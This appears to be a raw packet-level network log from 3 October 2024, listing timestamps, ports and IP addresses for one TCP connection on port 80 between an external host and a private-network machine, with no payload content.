Oct 3, 2024 21:36:12.657006025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.657021046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.657036066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.657047033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.657063007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.657073021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.657083035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.657097101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.657109022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.657126904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786595106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786627054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786643982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786659956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786675930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786690950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786705017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786715031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786727905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786740065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786752939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786762953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786778927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786787987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786830902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786845922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786859035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786878109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.786885977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786895037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.786909103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.915950060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.915987015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916007042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916023016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916038990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916045904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916059971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916076899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916091919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916104078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916114092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916129112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916137934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916152000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916178942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916187048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916351080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916366100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916384935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.916392088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916403055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.916423082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.919014931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.919059038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.919251919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.919297934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.919409990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.919459105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.919543982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.919586897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.919672966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.919709921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.919864893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.919902086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.920058012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.920073986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.920099020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.920111895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.920205116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.920248032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.920588017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.920603991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.920618057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.920625925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.920634985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.920650005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.920711040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.920803070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.920814991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.920840979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.920849085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.045258045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.045279026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.045290947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.045336008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.045373917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.045959949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.045978069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.045989037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046000957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046011925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046016932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046027899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046062946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046076059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046080112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046091080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046099901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046108961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046118021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046123981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046132088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046150923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046166897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046219110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046303988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046565056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046576023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046585083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046616077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046637058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046654940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046664953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046673059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.046696901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.046720028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.047276020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.047285080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.047293901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.047302961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.047312021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.047319889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.047354937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.047476053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.047487020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.047496080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.047506094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.047513962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.047537088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.048077106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048086882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048095942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048100948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048110008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048120022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.048125029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048135042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048141003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.048149109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048166990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.048183918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.048190117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048199892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048207998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048239946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.048831940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048842907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048851013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048860073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048867941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048875093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.048885107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048894882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.048902035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.049001932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.049088001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.049098015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.049107075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.049113989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.049122095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.049129009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.049144030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.049164057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.049880028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.049890041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.049899101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.049927950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.049945116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050043106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050052881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050060987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050070047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050079107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050090075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050096035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050102949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050112009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050118923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050127029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050132990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050152063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050472021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050520897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050668955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050678968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050688028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050697088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050705910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050713062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050721884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050730944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050738096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050753117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050776958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.050925970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.050964117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.051103115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051112890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051137924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.051147938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.051678896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051688910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051697969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051707983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051718950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051723957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.051733017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051739931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.051747084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051764965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.051779032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.051865101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051875114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051883936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051892996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.051899910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.051929951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.052277088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052288055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052295923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052305937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052314997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052326918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052331924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.052340031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052345991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.052361012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.052386045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.052467108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052501917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.052553892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052623034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.052751064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052809000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.052918911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.052959919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.053545952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053558111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053566933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053576946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053586006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.053591967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053601980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053611994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053618908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.053627968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053633928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.053642035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053653002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053661108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.053666115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.053677082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.053709984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.134959936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.134974957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.134980917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135046005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135051966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135056973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135062933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135195971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.135438919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135448933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135457993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135468960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135479927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.135484934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135497093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135502100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.135510921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135518074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.135526896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135544062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.135549068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.135555029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.135922909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136116982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136126995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136135101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136143923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136153936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136161089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136168003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136178970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136185884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136200905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136801004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136810064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136817932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136826992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136837006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136842966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136858940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136871099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136889935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136898994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136908054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136917114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136923075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136931896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136936903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136944056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136951923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136959076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136966944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.136974096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136985064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.136998892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.137718916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137728930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137737989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137747049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137754917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.137762070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137772083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137778044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.137785912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137794018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.137800932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137813091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137816906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.137825012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137833118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.137840033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.137845993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.137860060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.137871027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.138442039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.138451099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.138468027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.138478041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.138504028 CEST	49704	80	192.168.2.5	185.215.113.37
